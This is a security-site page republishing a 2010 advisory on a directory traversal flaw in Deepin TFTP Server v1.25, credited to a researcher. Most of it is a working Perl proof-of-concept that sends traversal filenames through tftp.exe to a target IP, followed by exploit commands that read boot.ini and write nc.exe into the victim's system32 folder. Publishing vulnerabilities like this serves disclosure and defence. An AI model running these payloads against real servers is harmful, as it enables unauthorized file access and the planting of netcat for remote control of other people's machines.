首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Deepin TFTP Server Directory Traversal Vulnerability Software Version : v1.25
来源:vfocus.net 作者: demonalex 发布时间:2010-08-26  
#Software : Deepin TFTP Server Directory Traversal Vulnerability Software Version : v1.25
#Vendor: Deepin.org
#Vulnerability Published : 2010-08-14
#Vulnerability Update Time :
#Status : 
#Impact : Medium
#Bug Description :
#Deepin TFTP Server does not properly sanitise filenames containing directory traversal sequences that are #received from an FTP client.
#Proof Of Concept :
#****************************************************************
#!/usr/bin/perl -w
$|=1;
$target_ip=shift || die "usage: $0 \$target_ip\n"; @directory_traversal=( '..\tmp.txt', '..\..\tmp.txt', '..\..\..\tmp.txt', '..\..\..\..\tmp.txt', '..\..\..\..\..\tmp.txt', '..\..\..\..\..\..\tmp.txt', '..\..\..\..\..\..\..\tmp.txt'
);
open(TMP, ">tmp.txt");
print TMP "tmp";
close(TMP);
foreach $dt_content (@directory_traversal){
	$dt_it=`tftp.exe $target_ip put tmp.txt $dt_content`;
	print "command : tftp.exe $target_ip put tmp.txt $dt_content\n";
	print "$dt_it";
	if($dt_it=~m/^Transferred successfully/){
		print "Directory Traversal PAYLOAD is $dt_content.\n";
		print "Press [ENTER] Button to continue...\n";
		<STDIN>;
	}
	sleep(3);
}
print "Finish!\n";
exit(0);
#****************************************************************
#Exploit :
#****************************************************************
#get sensitive file
#c:\windows\system32>tftp [VICTIM_IP] get ../../boot.ini boot.ini put malware c:\windows\system32>tftp [VICTIM_IP] put nc.exe ../../WINDOWS/system32/nc.exe
#****************************************************************
#Credits : This vulnerability was discovered by demonalex(at)163(dot)com Pentester/Researcher Dark2S Security Team/Venustech.GZ Branch



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows Contacts DLL
·Windows Internet Communication
·Roxio MyDVD 9 DLL Hijacking Ex
·Microsoft Office PowerPoint 20
·Adobe InDesign CS4 DLL Hijacki
·Mozilla Thunderbird DLL Hijack
·Cisco Packet Tracer 5.2 DLL Hi
·Adobe Extension Manager CS5 v5
·Adobe Illustrator CS4 DLL Hija
·Adobe ExtendedScript Toolkit C
·Adobe On Location CS4 DLL Hija
·CorelDRAW X3 v13.0.0.576 (crlr
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved